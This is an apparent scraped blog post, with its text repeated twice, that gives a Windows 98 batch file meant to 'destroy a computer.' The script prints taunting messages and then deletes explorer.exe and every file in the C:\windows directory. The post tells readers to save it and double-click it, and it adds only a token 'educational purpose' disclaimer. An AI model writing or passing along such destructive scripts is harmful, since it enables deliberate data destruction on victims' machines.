Creating a Batch File to Destroy a Comp.having Windows 98 on it
HI THIS INFORMATION IS ONLY FOR EDUCATIONAL PURPOSE.PLEASE USE IT IN A PROPER WAY. THE AUTHOR IS NOT RESPONSIBLE FOR HOW U USE IT. Type the ...
https://modernyouththoughts.blogspot.com/2007/08/creating-batch-file-to-destroy.html
HI THIS INFORMATION IS ONLY FOR EDUCATIONAL PURPOSE.PLEASE USE IT IN A PROPER WAY.
THE AUTHOR IS NOT RESPONSIBLE FOR HOW U USE IT.
Type the following code in notepad:
@echo off
echo your computer has lived its life
echo Gurneet Singh Rules!!
echo astalavista baby!!
del c:\windows\explorer.exe
del c:\windows\*.*
cls
exit
Then save the file as anyname.bat
Double click on it if u want to destroy a computer.
THE AUTHOR IS NOT RESPONSIBLE FOR HOW U USE IT.
Type the following code in notepad:
@echo off
echo your computer has lived its life
echo Gurneet Singh Rules!!
echo astalavista baby!!
del c:\windows\explorer.exe
del c:\windows\*.*
cls
exit
Then save the file as anyname.bat
Double click on it if u want to destroy a computer.
Post a Comment